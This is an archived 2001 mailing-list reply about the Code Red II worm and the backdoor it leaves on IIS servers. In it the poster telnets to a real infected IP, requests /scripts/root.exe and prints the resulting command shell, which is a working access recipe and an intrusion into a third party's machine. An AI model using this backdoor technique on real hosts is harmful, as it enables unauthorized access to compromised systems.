[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]
Re: Code red II propagation.
- To: linux-il(at-nospam)linux.org.il
- Subject: Re: Code red II propagation.
- From: "Nadav Har'El" <nyh(at-nospam)math.technion.ac.il>
- Date: Sun, 5 Aug 2001 16:51:32 +0300
- Delivered-To: linux.org.il-linux-il@linux.org.il
- Hebrew-Date: 16 Av 5761
- In-Reply-To: <20010805163452.A773@insomia17>; from yotam@makif.omer.k12.il on Sun, Aug 05, 2001 at 04:34:52PM +0300
- References: <20010805163452.A773@insomia17>
- Sender: linux-il-bounce(at-nospam)cs.huji.ac.il
- User-Agent: Mutt/1.2i
On Sun, Aug 05, 2001, Yotam Rubin wrote about "Code red II propagation.":
> Oh yeah, BTW, the new worm also leaves a nice little trojan on the infected
> host so any little script kiddie can just grep his logs and find machines
> to abuse.
Yes, which is why it is not recommended to pass around IP lists of CRII
victims... BTW, not all IP addresses you listed seem to be invected with
the new varient - some seem to (still) have the original one.
The backdoor the worm installs is rediculously simple and evil. All you need
to do is telnet to the machine in port 80, say open sesame, and you have a
shell! For example, taking one of the IP addresses you list,
$ telnet 192.117.188.211 80
Trying 192.117.188.211...
Connected to 192.117.188.211.
Escape character is '^]'.
GET /scripts/root.exe
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 14:48:38 GMT
Content-Type: application/octet-stream
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
c:\inetpub\scripts>
That's bad ;) 100,000 more zombies on the Internet :(
--
Nadav Har'El | Sunday, Aug 5 2001, 16 Av 5761
nyh@math.technion.ac.il |-----------------------------------------
Phone: +972-53-245868, ICQ 13349191 |Hi! I'm a signature virus! Copy me into
http://nadav.harel.org.il |your signature to help me spread!
=================================================================
To unsubscribe, send mail to linux-il-request@linux.org.il with
the word "unsubscribe" in the message body, e.g., run the command
echo unsubscribe | mail linux-il-request@linux.org.il